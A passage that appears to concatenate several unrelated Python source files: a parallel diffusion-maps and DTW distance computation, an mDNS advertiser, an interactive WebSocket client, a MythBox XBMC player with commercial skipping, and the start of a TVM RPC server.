np.copyto(data_copy, data, casting='no')
#use pool to run function in parallel
func = partial(workers.dis_shm, inv_c_copy.shape, inv_c_copy.dtype,
subidx_copy.shape, subidx_copy.dtype,
dataref_copy.shape, dataref_copy.dtype,
data_copy.shape, data_copy.dtype,
Dis.shape, Dis.dtype, M)
#build starmap iterable
arr = []
cpu_count = os.cpu_count()
step = m//cpu_count
start = 0
for i in range(cpu_count-1):
arr.append((step, start))
start = start + step
arr.append((m - start, start))
#run function in parallel
pool.starmap(func, arr)
if process_pool == None:
pool.close()
pool.join()
#copy results out of shared memory
Dis_copy = np.ndarray(Dis.shape, Dis.dtype, buffer=shm_result.buf)
np.copyto(Dis, Dis_copy, casting='no')
del inv_c_copy
del subidx_copy
del dataref_copy
del data_copy
del Dis_copy
#close and cleanup shared memory
shm_inv_c.close()
shm_inv_c.unlink()
shm_subidx.close()
shm_subidx.unlink()
shm_dataref.close()
shm_dataref.unlink()
shm_data.close()
shm_data.unlink()
shm_result.close()
shm_result.unlink()
else:
# without shared memory, each worker process will use ~700MB of RAM.
# with it, they will use ~100MB each
print('Python version is < 3.8, cannot use shared memory. Beware of high memory usage')
dis = partial(workers.dis, self.inv_c, subidx, dataref, data, M)
results = pool.map(dis, range(m), chunksize=m//os.cpu_count())
if process_pool == None:
pool.close()
pool.join()
for j in range(m):
Dis[:, j] = results[j]
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
## Anisotropic kernel
print('aniostropic kernel ... ', end='')
ep = np.median(np.median(Dis, 0)) # default scale - should be adjusted for each new realizations
A = np.exp(-Dis / (4 * ep))
W_sml = A.T @ A
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1
d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2
D = np.diag(np.sqrt(1 / d2))
###
### Part II
###
# Compute eigenvectors
# in numpy,
# from numpy import linalg as LA
# w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# Compute all eigenvectors and select 10
# [V, E] = eigs(W2, 10) Matlab
# V, E = mh.eig_like_matlab(W2, 10) # think this is correct now ...
# Compute only 10 eigenvectors, must have symmetric matrix
# V, E = mh.eigs_like_matlab(W2,10)
num_rdims =self.num_rdims
V, E = mh.eigs_like_matlab(W2,num_rdims)
# print('V.shape', V.shape)
# print('E.shape', E.shape)
# python np.sum(A,0) <=> matlab sum(A)
# in matlab, srted are the values of sum(E) sorted (in descending order)
# and IE are the indices that sorted them
# [srtdE, IE] = sort(sum(E), 'descend')
# this is python eqivalent ... note that IE will have values one less than the MATLAB, because zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1] # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]
# Phi = D @ V(:, IE(1, 2:10))
Phi = D @ V[:, IE[1:]]
print('done')
###
### Part III
###
# TODO - not necessary? (Independent coordinates?)
# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='')
Psi_list = [] # holds all the psi_i values
omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m]) # omega needed to be shaped as a column
# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
# this line is strange ... order of operations for @?, what is the offset?
psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
# [Psi, psi_i]
Psi_list.append(psi_i)
# convert Psi_list back into an array, shaped like MATLAB version
self.Psi = np.array(Psi_list).T
# psi have have very small imaginary values ...
# cast to real here, but need to check
self.Psi = np.real(self.Psi)
# print('Psi.shape', Psi.shape)
print('done')
#data must be passed as numpy array of snippets or windows
def dtw_matrix_parallel(self, data, process_pool=None):
if not (sys.version_info >= (3,8,0)):
print('Python version is < 3.8, cannot use shared memory. Aborting')
assert False
print('computing dtw matrix in parallel')
start_time = time.time()
pool = process_pool
if process_pool == None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
#process_list = []
#m = Manager()
#lock = m.Lock()
self.dtw_distmat = np.zeros((data.shape[0], data.shape[0]))
print('Python version is >= 3.8, using shared memory')
from multiprocessing import shared_memory
#create shared memory for numpy arrays
#print(data.nbytes)
#print(self.dtw_distmat.nbytes)
shm_data = shared_memory.SharedMemory(name='dtw_data',
create=True, size=data.nbytes)
shm_result = shared_memory.SharedMemory(name='dtw_result',
create=True, size=self.dtw_distmat.nbytes)
#copy arrays into shared memory
data_copy = np.ndarray(data.shape, data.dtype, buffer=shm_data.buf)
np.copyto(data_copy, data, casting='no')
self.dtw_distmat = np.zeros((data.shape[0], data.shape[0]))
result = np.ndarray(self.dtw_distmat.shape, self.dtw_distmat.dtype, buffer=shm_result.buf)
#use pool to run function in parallel
func = partial(workers.dtw_shm, data_copy.shape, data_copy.dtype,
result.shape, result.dtype)
#build starmap iterable
cpu_count = os.cpu_count()
n = self.dtw_distmat.shape[0]
each = n*n/float(os.cpu_count())
arr = [(0, int(math.sqrt(each)))]
for i in range(2, os.cpu_count()):
arr.append((arr[-1][1], int(math.sqrt(each*i))))
arr.append((arr[-1][1], n))
#run function in parallel
#for args in arr:
# p = Process(target=func, args=args)
# process_list.append(p)
# print("starting process from ", args[0], " to ", args[1])
# p.start()
#for p in process_list:
# print("joining process")
# p.join()
pool.starmap(func, arr)
print("done processing dtw")
if process_pool == None:
pool.close()
pool.join()
#copy results out of shared memory
np.copyto(self.dtw_distmat, result, casting='no')
del data_copy
del result
#close and cleanup shared memory
shm_data.close()
shm_data.unlink()
shm_result.close()
shm_result.unlink()
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
return self.dtw_distmat
|
mdns_advertiser.py
|
#!/usr/bin/env python
import logging
import socket
import time
import threading
import netifaces as ni
from zeroconf import ServiceInfo, Zeroconf
logger = logging.getLogger(__name__)
class MDNSAdvertiser(object):
def __init__(self, type_, name, port, properties, server, interface):
self.type = type_
self.name = name
self.interface = interface if interface else "eth0"
self.address = self.get_network_ip_address(interface)
self.port = port
self.properties = properties
self.server = server if server else socket.gethostname()
self.service = None
self.advertiser_thread = None
self.connectivity_thread = None
self.alive = None
@staticmethod
def get_network_ip_address(interface='eth0'):
"""
Get the first IP address of a network interface.
:param interface: The name of the interface.
:return: The IP address.
"""
if interface not in ni.interfaces():
logger.error('Could not find interface {}.'.format(interface))
return None
interface = ni.ifaddresses(interface)
if (2 not in interface) or (len(interface[2]) == 0):
logger.warning('Could not find IP of interface {}.'.format(interface))
return None
return interface[2][0]['addr']
def start(self):
self.alive = True
self.connectivity_thread = threading.Thread(target=self.__check_connectivity)
self.connectivity_thread.setDaemon(1)
self.connectivity_thread.start()
def stop(self):
if self.alive:
self.alive = False
if self.connectivity_thread:
self.connectivity_thread.join()
if self.advertiser_thread:
self.advertiser_thread.join()
logger.debug("mDNS advertiser stopped")
def __check_connectivity(self):
while self.alive and not self.address:
self.address = self.get_network_ip_address(self.interface)
time.sleep(1)
if self.alive:
self.advertiser_thread = threading.Thread(target=self.__start_advertising)
self.advertiser_thread.setDaemon(1)
self.advertiser_thread.start()
logger.debug("mDNS advertiser started")
def __start_advertising(self):
self.service = ServiceInfo("{}._tcp.local.".format(self.type),
"{}.{}._tcp.local.".format(self.name, self.type),
port=self.port,
weight=0,
priority=0,
properties=self.properties,
server="{}.local.".format(self.server),
addresses=[socket.inet_aton(self.address)])
zeroconf = Zeroconf()
zeroconf.register_service(self.service)
while self.alive:
time.sleep(.5)
zeroconf.unregister_service(self.service)
zeroconf.close()
|
__main__.py
|
import argparse
import asyncio
import os
import signal
import sys
import threading
import websockets
from websockets.exceptions import format_close
def win_enable_vt100():
"""
Enable VT-100 for console output on Windows.
See also https://bugs.python.org/issue29059.
"""
import ctypes
STD_OUTPUT_HANDLE = ctypes.c_uint(-11)
INVALID_HANDLE_VALUE = ctypes.c_uint(-1)
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x004
handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
if handle == INVALID_HANDLE_VALUE:
raise RuntimeError("Unable to obtain stdout handle")
cur_mode = ctypes.c_uint()
if ctypes.windll.kernel32.GetConsoleMode(handle, ctypes.byref(cur_mode)) == 0:
raise RuntimeError("Unable to query current console mode")
# ctypes ints lack support for the required bit-OR operation.
# Temporarily convert to Py int, do the OR and convert back.
py_int_mode = int.from_bytes(cur_mode, sys.byteorder)
new_mode = ctypes.c_uint(py_int_mode | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
if ctypes.windll.kernel32.SetConsoleMode(handle, new_mode) == 0:
raise RuntimeError("Unable to set console mode")
def exit_from_event_loop_thread(loop, stop):
loop.stop()
if not stop.done():
# When exiting the thread that runs the event loop, raise
# KeyboardInterrupt in the main thead to exit the program.
try:
ctrl_c = signal.CTRL_C_EVENT # Windows
except AttributeError:
ctrl_c = signal.SIGINT # POSIX
os.kill(os.getpid(), ctrl_c)
def print_during_input(string):
sys.stdout.write(
(
# Save cursor position
"\N{ESC}7"
# Add a new line
"\N{LINE FEED}"
# Move cursor up
"\N{ESC}[A"
# Insert blank line, scroll last line down
"\N{ESC}[L"
# Print string in the inserted blank line
"{string}\N{LINE FEED}"
# Restore cursor position
"\N{ESC}8"
# Move cursor down
"\N{ESC}[B"
).format(string=string)
)
sys.stdout.flush()
def print_over_input(string):
sys.stdout.write(
(
# Move cursor to beginning of line
"\N{CARRIAGE RETURN}"
# Delete current line
"\N{ESC}[K"
# Print string
"{string}\N{LINE FEED}"
).format(string=string)
)
sys.stdout.flush()
async def run_client(uri, loop, inputs, stop):
try:
websocket = await websockets.connect(uri)
except Exception as exc:
print_over_input("Failed to connect to {}: {}.".format(uri, exc))
exit_from_event_loop_thread(loop, stop)
return
else:
print_during_input("Connected to {}.".format(uri))
try:
while True:
incoming = asyncio.ensure_future(websocket.recv())
outgoing = asyncio.ensure_future(inputs.get())
done, pending = await asyncio.wait(
[incoming, outgoing, stop], return_when=asyncio.FIRST_COMPLETED
)
# Cancel pending tasks to avoid leaking them.
if incoming in pending:
incoming.cancel()
if outgoing in pending:
outgoing.cancel()
if incoming in done:
try:
message = incoming.result()
except websockets.ConnectionClosed:
break
else:
print_during_input("< " + message)
if outgoing in done:
message = outgoing.result()
await websocket.send(message)
if stop in done:
break
finally:
await websocket.close()
close_status = format_close(websocket.close_code, websocket.close_reason)
print_over_input(
"Connection closed: {close_status}.".format(close_status=close_status)
)
exit_from_event_loop_thread(loop, stop)
def main():
# If we're on Windows, enable VT100 terminal support.
if os.name == "nt":
try:
win_enable_vt100()
except RuntimeError as exc:
sys.stderr.write(
(
"Unable to set terminal to VT100 mode. This is only "
"supported since Win10 anniversary update. Expect "
"weird symbols on the terminal.\nError: {exc!s}\n"
).format(exc=exc)
)
sys.stderr.flush()
try:
import readline # noqa
except ImportError: # Windows has no `readline` normally
pass
# Parse command line arguments.
parser = argparse.ArgumentParser(
prog="python -m websockets",
description="Interactive WebSocket client.",
add_help=False,
)
parser.add_argument("uri", metavar="<uri>")
args = parser.parse_args()
# Create an event loop that will run in a background thread.
loop = asyncio.new_event_loop()
# Create a queue of user inputs. There's no need to limit its size.
inputs = asyncio.Queue(loop=loop)
# Create a stop condition when receiving SIGINT or SIGTERM.
stop = asyncio.Future(loop=loop)
# Schedule the task that will manage the connection.
asyncio.ensure_future(run_client(args.uri, loop, inputs, stop), loop=loop)
# Start the event loop in a background thread.
thread = threading.Thread(target=loop.run_forever)
thread.start()
# Read from stdin in the main thread in order to receive signals.
try:
while True:
# Since there's no size limit, put_nowait is identical to put.
message = input("> ")
loop.call_soon_threadsafe(inputs.put_nowait, message)
except (KeyboardInterrupt, EOFError): # ^C, ^D
loop.call_soon_threadsafe(stop.set_result, None)
# Wait for the event loop to terminate.
thread.join()
if __name__ == "__main__":
main()
|
player.py
|
#
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2011 analogue@yahoo.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import copy
import logging
import os
import threading
import time
import xbmc
import xbmcgui
import mythbox.msg as m
import mythbox.ui.toolkit as toolkit
from mythbox.ui.toolkit import showPopup
from mythbox.util import formatSeconds, BoundedEvictingQueue, safe_str, catchall
from mythbox.mythtv.db import inject_db
log = logging.getLogger('mythbox.ui')
mlog = logging.getLogger('mythbox.method')
mythPlayer = None
# Interval in millis to sleep when we're waiting around for
# async xbmc events to take complete
SLEEP_MILLIS = 250
class BasePlayer(xbmc.Player):
def __init__(self, *args, **kwargs):
xbmc.Player.__init__(self, *args, **kwargs)
self.active = True
self.tracker = PositionTracker(self)
def buildPlaybackUrl(self):
raise Exception('Abstract method')
def buildPlayList(self):
raise Exception('Abstract method')
def playRecording(self, commSkipper):
raise Exception('Abstract method')
@catchall
def onPlayBackStarted(self):
if self.active:
log.debug('> base:onPlayBackStarted %s' % self)
for target in (self.bookmarker, self.tracker, self.commSkipper):
try:
target.onPlayBackStarted()
except:
log.exception('onPlayBackStarted')
log.debug('< base:onPlayBackStarted %s' % self)
def onPlayBackStopped(self):
if self.active:
self.active = False
log.debug('> onPlayBackStopped')
for target in (self.tracker, self.commSkipper, self.bookmarker):
try:
target.onPlayBackStopped()
except:
log.exception('onPlayBackStopped')
log.debug('< onPlayBackStopped')
def onPlayBackEnded(self):
if self.active:
self.active = False
log.debug('> onPlayBackEnded')
for target in (self.tracker, self.commSkipper, self.bookmarker):
try:
target.onPlayBackEnded()
except:
log.exception('onPlayBackStopped')
log.debug('< onPlayBackEnded')
class MountedPlayer(BasePlayer):
'''Plays mythtv recordings with support for bookmarks, commercial skipping, etc'''
def __init__(self, *args, **kwargs):
BasePlayer.__init__(self, *args, **kwargs)
[setattr(self,k,v) for k,v in kwargs.iteritems() if k in ('translator', 'mythThumbnailCache', 'program', 'platform')]
self.bookmarker = MythBookmarker(self, self.program, self.translator)
self._playbackCompletedLock = threading.Event()
self._playbackCompletedLock.clear()
def buildPlaybackUrl(self):
return self.program.getLocalPath()
def playRecording(self, commSkipper):
"""
Plays the given program. Blocks until playback is stopped or until the
end of the recording is reached
"""
mlog.debug('> playRecording(%s)' % safe_str(self.program.title()))
assert not self.isPlaying(), 'Player is already playing a video'
self.commSkipper = commSkipper
self.play(self.buildPlaybackUrl(), self.buildPlayList(), windowed=False)
self.waitForPlaybackCompleted()
self.active = False
mlog.debug('< playRecording(...)')
# Callbacks ---------------------------------------------------------------
@catchall
def onPlayBackStopped(self):
if self.active:
try:
super(MountedPlayer, self).onPlayBackStopped()
finally:
self._playbackCompletedLock.set()
@catchall
def onPlayBackEnded(self):
if self.active:
try:
super(MountedPlayer, self).onPlayBackEnded()
finally:
self._playbackCompletedLock.set()
# Private -----------------------------------------------------------------
def waitForPlaybackCompleted(self):
while not self._playbackCompletedLock.isSet():
#log.debug('Waiting for playback completed...')
xbmc.sleep(SLEEP_MILLIS)
def buildPlayList(self):
mlog.debug("> _buildPlayList")
playlistItem = xbmcgui.ListItem()
title = self.program.fullTitle()
comms = self.program.getCommercials()
if len(comms) > 0:
title += '(%s breaks - %s)' % (len(comms), ', '.join(map(lambda c: formatSeconds(c.start), comms)))
playlistItem.setInfo(
"video", {
"Genre" : self.program.category(),
"Studio" : self.program.formattedChannel(),
"Title" : title,
"Plot" : self.program.formattedDescription()
})
# TODO: Set start offset if a comm break starts at 0.0
# playlistItem.setProperty('StartOffset', '256.4')
mlog.debug("< _buildPlayList")
return playlistItem
class StreamingPlayer(BasePlayer):
"""Use xbmcs built in myth support to stream the recording over the network."""
def __init__(self, *args, **kwargs):
BasePlayer.__init__(self, *args, **kwargs)
[setattr(self,k,v) for k,v in kwargs.iteritems() if k in ('settings', 'translator', 'mythThumbnailCache', 'program', 'platform')]
self.bookmarker = MythBookmarker(self, self.program, self.translator)
@inject_db
def buildPlaybackUrl(self):
backend = self.db().toBackend(self.program.hostname())
# myth://dbuser:dbpassword@mythbackend_hostname:mythbackend_port/recordings/filename.mpg
url = 'myth://%s:%s@%s:%s/recordings/%s' % (
self.settings.get('mysql_database'),
self.settings.get('mysql_password'),
backend.ipAddress,
backend.port,
self.program.getBareFilename())
log.debug('Playback url: %s' % url)
return url
def playRecording(self, commSkipper):
"""
Plays the given program. Blocks until playback is stopped or until the
end of the recording is reached
"""
mlog.debug('> playRecording %s' % safe_str(self.program.title()))
assert not self.isPlaying(), 'Player is already playing a video'
self.commSkipper = commSkipper
self.play(self.buildPlaybackUrl(), self.buildPlayList())
mlog.debug('< playRecording')
def buildPlayList(self):
playlistItem = xbmcgui.ListItem()
comms = self.program.getCommercials()
title = self.program.fullTitle()
if len(comms) > 0:
# times are invalid when streaming so only show cardinality
title += u' (%d breaks)' % len(comms)
playlistItem.setInfo(
"video", {
"Genre" : self.program.category(),
"Studio" : self.program.formattedChannel(),
"Title" : title,
"Plot" : self.program.formattedDescription()
})
return playlistItem
class Bookmarker(object):
pass
class XbmcBookmarker(Bookmarker):
'''When using a myth:// style URL for playback, defer to XBMC's built in
resume from last postion functionality'''
def __init__(self, *args, **kwargs):
pass
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
class MythBookmarker(Bookmarker):
'''Mimics XBMC video player's builtin auto resume functionality'''
def __init__(self, player, program, translator):
self.player = player
self.program = program
self.translator = translator
#self.fps = None
def onPlayBackStarted(self):
self._resumeFromBookmark()
def onPlayBackStopped(self):
self._saveLastPositionAsBookmark()
def onPlayBackEnded(self):
self._clearBookmark()
def _clearBookmark(self):
if self.program.isBookmarked():
self.program.setBookmark(0.0)
def _resumeFromBookmark(self):
log.debug('bookmarker : before wait for gotFPS')
bookmarkSecs = self.program.getBookmark()
if bookmarkSecs > 0 and bookmarkSecs < (self.program.getDuration() * 60):
fb = formatSeconds(bookmarkSecs)
log.debug('Resuming recording at bookmarked position of %s' % fb)
showPopup(self.program.title(), self.translator.get(m.RESUMING_AT) % fb)
self.player.seekTime(bookmarkSecs)
while self.player.getTime() < bookmarkSecs:
log.debug('Waiting for player time %s to seek past bookmark of %s' %(formatSeconds(self.player.getTime()), fb))
xbmc.sleep(SLEEP_MILLIS)
else:
log.debug('Recording has no bookmark or bookmark exceeds program length')
def _saveLastPositionAsBookmark(self):
lastPos = self.player.tracker.getLastPosition()
log.debug('Setting bookmark on %s to %s' %(safe_str(self.program.title()), formatSeconds(lastPos)))
try:
self.program.setBookmark(lastPos)
except:
log.exception('_saveLastPositionAsBookmark catchall')
class PositionTracker(object):
"""
Tracks the last position of the player. This is necessary because
Player.getTime() is not valid after the callback to
Player.onPlayBackStopped() has completed.
"""
HISTORY_SECS = 5 # Number of seconds of history to keep around
def __init__(self, player):
self._player = player
self._lastPos = 0.0
self._tracker = BoundedEvictingQueue((1000/SLEEP_MILLIS) * self.HISTORY_SECS)
self._history = []
def onPlayBackStarted(self):
log.debug('Starting position tracker...')
self._tracker = threading.Thread(
name='Position Tracker',
target = self._trackPosition)
self._tracker.start()
def onPlayBackStopped(self):
if self._tracker.isAlive():
log.debug('Position tracker stop called. Still alive = %s' % self._tracker.isAlive())
else:
log.debug('Position tracker thread already dead.')
def onPlayBackEnded(self):
self.onPlayBackStopped()
def getHistory(self, howFarBack):
"""Returns a list of TrackerSamples from 'howFarBack' seconds ago."""
endPos = self._lastPos
startPos = endPos - howFarBack
slice = []
for sample in self._history:
if startPos <= sample.pos and sample.pos <= endPos:
slice.append(sample)
log.debug('Tracker history for %s secs = [%s] %s' % (howFarBack, len(slice), slice))
return slice
def getLastPosition(self):
return self._lastPos
def _trackPosition(self):
"""Method run in a separate thread. Tracks last position of player as long as it is playing"""
try:
while self._player.isPlaying():
self._lastPos = self._player.getTime()
self._history.append(TrackerSample(time.time(), self._lastPos))
#log.debug('Tracker time = %s' % self._lastPos)
xbmc.sleep(SLEEP_MILLIS)
log.debug('Position tracker thread exiting with lastPos = %s' % self.getLastPosition())
except:
log.exception('_trackPosition catchall')
class TrackerSample(object):
def __init__(self, time, pos):
self.time = time
self.pos = pos
def __repr__(self):
return 'Sample {time = %s, pos = %s}' % (self.time, self.pos)
class ICommercialSkipper(object):
"""Common interface for commercial skipping implementations."""
def __init__(self, player, program, translator):
self.player = player
self.program = program
self.translator = translator
def onPlayBackStarted(self):
raise NotImplementedError, 'Abstract base class'
def onPlayBackStopped(self):
raise NotImplementedError, 'Abstract base class'
def onPlayBackEnded(self):
raise NotImplementedError, 'Abstract base class'
class NoOpCommercialSkipper(ICommercialSkipper):
def __init__(self, player=None, program=None, translator=None):
ICommercialSkipper.__init__(self, player, program, translator)
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
class TrackingCommercialSkipper(ICommercialSkipper):
"""
Commercial skipper that monitors the position of the currently playing file
and skips commercials accordingly.
"""
def __init__(self, player, program, translator):
ICommercialSkipper.__init__(self, player, program, translator)
def onPlayBackStarted(self):
log.debug('program in skipper = %s' % safe_str(self.program.title()))
# don't want changes to commbreak.skipped to stick beyond the scope of
# this player instance so use a deepcopy
self._breaks = copy.deepcopy(self.program.getCommercials())
# Has a value when video position falls in a comm break
self._currentBreak = None
for b in self._breaks:
log.debug('break = %s' % b)
self._skipper = threading.Thread(name='Tracking Commercial Skipper', target = self._trackCommercials)
self._skipper.start()
def onPlayBackStopped(self):
if self._skipper.isAlive():
log.debug('Commercial tracker stop called. Still alive = %s' % self._skipper.isAlive())
else:
log.debug('Commercial tracker thread already dead')
def onPlayBackEnded(self):
self.onPlayBackStopped()
def _isInBreak(self, pos):
for b in self._breaks:
if b.isDuring(pos):
self._currentBreak = b
return True
self._currentBreak = None
return False
def _trackCommercials(self):
"""Method run in a separate thread to skip over commercials"""
try:
if len(self._breaks) == 0:
log.debug('Recording %s has no comm breaks, exiting comm tracker' % safe_str(self.program.title()))
return
while self.player.isPlaying():
pos = self.player.getTime()
if self._isInBreak(pos) and not self._currentBreak.skipped:
log.debug('entered comm break = %s' % self._currentBreak)
if self._isCloseToStartOfCommercial(pos) and not self._wasUserSkippingAround(pos):
log.debug('Comm skip activated!')
showPopup(self.program.title(), self.translator.get(m.SKIPPING_COMMERCIAL) % formatSeconds(self._currentBreak.duration()), 3000)
self.player.seekTime(self._currentBreak.end)
self._waitForPlayerToPassCommercialBreak()
self._currentBreak.skipped = True
if self._landedInCommercial(pos):
log.debug("Landed in comm break and want to skip forward")
showPopup(self.program.title(), self.translator.get(m.FORWARDING_THROUGH) % formatSeconds(self._currentBreak.duration()), 3000)
self.player.seekTime(self._currentBreak.end)
self._waitForPlayerToPassCommercialBreak()
self._currentBreak.skipped = True
xbmc.sleep(SLEEP_MILLIS)
log.debug('Commercial tracker thread exiting')
except:
log.exception('_trackCommercials catchall')
def _landedInCommercial(self, currPos):
#samplesInCommercial = 4 # In commercial for 2 seconds
secondsToSample = 4
samples = self.player.tracker.getHistory(secondsToSample)
samplesInCommercial = len(filter(lambda x: self._currentBreak.isDuring(x.pos), samples))
log.debug('Samples in commercial = %d' % samplesInCommercial)
return samplesInCommercial > 8 and samplesInCommercial < 12
def _wasUserSkippingAround(self, currPos):
"""
Check last 2 seconds of history for number of samples.
A high number of samples indicates that user was probably
not skipping around in the video hence the comm skip would
be a good thing.
"""
wasSkipping = False
samplePeriodSecs = 2 # TODO: Pass in as param to method call
# If currPos is too close to the start of the video..assume not
# skipping around
if currPos > samplePeriodSecs:
requiredSamples = 6 # TODO: Derive as percentage instead of hardcoding
numSamples = len(self.player.tracker.getHistory(samplePeriodSecs))
log.debug('Samples in last %s seconds = %s' %(samplePeriodSecs, numSamples))
wasSkipping = numSamples < requiredSamples
log.debug('User was skipping around = %s' % wasSkipping)
return wasSkipping
def _isCloseToStartOfCommercial(self, currPos):
"""
check that the current pos is close in proximity to the start of the
commercial break. assumes that comm break is skipped only if the user
played directly into the commercial vs. landing inside the commercial
via ffwd, rewind, etc.
"""
windowStart = self._currentBreak.start - 1
windowEnd = self._currentBreak.start + 2
isClose = currPos >= windowStart and currPos <= windowEnd
log.debug('User close to start of comm break = %s' % isClose)
return isClose
def _waitForPlayerToPassCommercialBreak(self):
# TODO: What if user stops playing while in this loop? Add isPlaying() to loop invariant
# wait for player pos to pass current break
while self._currentBreak.isDuring(self.player.getTime()):
xbmc.sleep(SLEEP_MILLIS)
|
server.py
|
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
def _server_env(load_library, logger):
"""Server environment function return temp dir"""
temp = util.tempdir()
if logger is None:
logger = logging.getLogger()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, silent):
"""Server loop"""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
sockfd = sock.fileno()
temp = _server_env(load_library, logger)
base._ServerLoop(sockfd)
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr, silent):
"""Listening loop of the server master."""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
tracker_conn : connnection to tracker
Tracker connection
ping_period : float, optional
ping tracker every k seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.info("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr, silent=silent)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
if silent:
return
else:
raise exc
# step 3: serving
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, silent))
server_proc.deamon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
